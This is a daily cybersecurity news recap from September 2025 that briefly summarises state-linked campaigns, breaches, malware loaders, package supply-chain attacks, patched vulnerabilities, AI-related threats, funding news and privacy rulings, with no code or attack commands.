Cyber Security News Daily Recap

Cybersecurity News | Daily Recap [18 Sep 2025]

admin
Cybersecurity News | Daily Recap [18 Sep 2025]

Daily Recap, Cybersecurity News highlights a wave of state and geopolitical activity, including APT28’s Phantom Net targeting Ukraine and TA415’s Silent Spy operations leveraging VS Code remote tunnels, plus AI-driven disinformation tied to Romania and cross-border attacks against India’s infrastructure. The cybercrime section notes high-profile breaches (Tiffany, Insight Partners, Brevard) and evolving tooling (CountLoader, SystemBC) alongside AI-enabled phishing and credential theft on cloud platforms, with notable incidents like Scattered Spider and JLR, and regulatory actions shaping the risk landscape. #PhantomNet #SilentSpy #RomaniaInfluence #IndiaAttacks #AfghanistanNetban #PolandResponse #ScatteredTeens #JLRAttack #CountLoader #SystemBC #RevengeHotels #SonicWallNotice #ShadowLeak #AICrypto #ShinyHunters #GhostActionTokens #Shai-hulud #SilentSync #GlassAction

State & Geopolitical Threats

  • APT28 ran the modular “Phantom Net Voxel” campaign using social engineering, steganography and cloud C2 to target Ukraine government systems – Phantom Net
  • TA415 continues spearphishing U.S. government and academic targets, abusing VS Code remote tunnels and cloud services for covert access and economic espionage – Silent Spy, VS Code Spy
  • Authorities say a Russia-linked hybrid campaign used AI disinformation, bot farms and cyberattacks to influence Romania‘s 2024 elections, leading to arrests and charges – Romania Influence
  • Coordinated hacktivist campaigns and DDoS/defacement operations are targeting India‘s infrastructure, raising regional tensions and cross-border concerns – India Attacks
  • The Taliban ordered fiber-optic internet shutdowns in several Afghan provinces, deepening isolation and disrupting education and the economy – Afghanistan Netban
  • Russia-linked intrusions prompted Poland to boost cybersecurity spending to €1bn after attacks on hospitals and water systems, highlighting hybrid-threat escalation – Poland Response

Cybercrime & Ransomware

  • UK police charged two teens tied to the Scattered Spider group over the Transport for London hack, part of a wave of transnational attacks linked to U.S. healthcare and corporate intrusions – Scattered Teens, TfL Arrests
  • The Jaguar Land Rover cyberattack attributed to LAPSUS$/related actors has stalled production, extended shutdowns and sparked supplier losses and layoff fears across the UK auto sector – JLR Attack, JLR Halt, JLR Shockwave
  • Multiple breaches hit organizations: Tiffany exposed data for over 2,500 customers (gift cards), VC firm Insight Partners warned >12,000 impacted after a ransomware/social-engineering incident, and Medical Associates of Brevard leaked ~250,000 patient records linked to BianLianTiffany Breach, Insight Breach, Brevard Leak
  • New and expanding toolsets fuel ransomware campaigns: CountLoader (multi-version loader) and modular loaders deliver Cobalt Strike and PureHVNC mainly in Ukraine; SystemBC turns infected VPS into a proxy network with >1,500 daily bots – CountLoader, SystemBC
  • Hotel-focused group RevengeHotels/TA558 and related campaigns use AI-generated phishing to deploy Venom RAT, exfiltrate payment data, and target hospitality chains globally – Hotel RAT, Hotel Theft
  • SonicWall confirmed attackers accessed cloud-stored firewall backup files and urged credential resets for under 5% of customers after brute-force access; multiple advisories and follow-ups published – SonicWall Notice, SonicWall Follow-up, SonicWall Advisory
  • Law enforcement continues pressure on cybercriminal infrastructure: the founder of BreachForums was resentenced to 3 years, underscoring efforts to disrupt dark-web marketplaces and forums – BreachForums Case
  • Emerging tactics include fake AnyDesk installers and DLL sideloading used to push MetaStealer and Cephalus ransomware, showing evolving infection chains and social engineering ruses – MetaStealer Tactics

Supply Chain & Package Ecosystem

  • PyPI saw malicious packages delivering the SilentSync RAT across Windows, Linux and macOS, illustrating rising risks to developers from package-supply-chain attacks – SilentSync
  • Open-source ecosystems reacted after the GhostAction supply-chain compromise: PyPI invalidated stolen tokens (3,300+ secrets across ecosystems) to prevent misuse – GhostAction Tokens
  • A self-replicating worm dubbed Shai-hulud infected 180+ npm packages by abusing stolen GitHub/npm credentials and malicious workflows, expanding automated supply-chain risks – Shai-hulud
  • Mass credential/token theft hit cloud CRMs as ShinyHunters claimed ~1.5 billion Salesforce records stolen via compromised OAuth tokens, underscoring OAuth and cloud-token risks – ShinyHunters

Vulnerabilities & Patch Alerts

  • Google patched an actively exploited Chrome zero-day CVE-2025-10585 (V8 type confusion) — users should update immediately; multiple write-ups and advisories published – Chrome Zero-Day, Chrome Patch, Chrome Advisory
  • WatchGuard released fixes for a critical Firebox RCE vulnerability CVE-2025-9242 in Fireware OS and urged immediate patching to prevent exploitation – WatchGuard Fix
  • Open-source screenshot tool Greenshot was found vulnerable to code execution via WM_COPYDATA in versions ≤1.3.300; upgrade to 1.3.301 now – Greenshot Patch
  • Microsoft warned that Office 2016 and Office 2019 reach end-of-support on 14 Oct 2025 (plus Windows 10 and older Exchange versions), urging migrations to avoid security gaps – MS End-of-Support

AI, Crypto & Emerging Threats

  • Researchers disclosed ShadowLeak, a server-side data-theft attack that targeted ChatGPT’s Deep Research by tricking the model into exfiltrating sensitive data — OpenAI mitigated the issue – ShadowLeak
  • AI-driven scams fueled an unprecedented crypto crime wave in H1 2025 with more than $3.01 billion stolen via deepfakes and automated social-engineering, increasing scale and realism of attacks – AI Crypto
  • Threat actors increasingly use AI in operations: TA558/Restaurant/Hotel campaigns employ AI-generated scripts to deploy Venom RAT, and guidance urges prep for quantum- and AI-era threats and quantum-safe cryptography – AI RAT, AI & Quantum Guide

Industry, Events & Funding

  • Glilot Capital raised $500 million to back cybersecurity, AI and enterprise startups, bringing AUM to >$1 billion and signaling resilient cyber VC interest – Glilot Raise
  • VC and security funding news: Irregular raised $80 million for AI security testing and RegScale closed $30 million for its GRC/CCM platform – Irregular $80M, RegScale $30M
  • Events and thought leadership: Black Hat’s CISO podcast (Episode 8) and an Attack Surface Management virtual summit offer tactical guidance on leadership, crisis management and reducing cloud attack surface – BlackHat CISO, ASM Summit
  • Microsoft added free AI features to Notepad on Copilot+ Windows 11 PCs (local/cloud models) while reminding admins of product lifecycles—useful for end-user security and UX planning – Notepad AI

Privacy & Regulation

  • Australia’s privacy regulator ruled Kmart’s facial-recognition pilot unlawful for collecting biometric data without consent, stressing legal limits on retail surveillance – Kmart Ruling
  • A U.S. judge rejected Meta’s attempt to overturn liability in the Flo health-data privacy case, reinforcing scrutiny over app data collection and consumer privacy rights – Flo Verdict

Cybersecurity News | Daily Recap – hendryadrian.com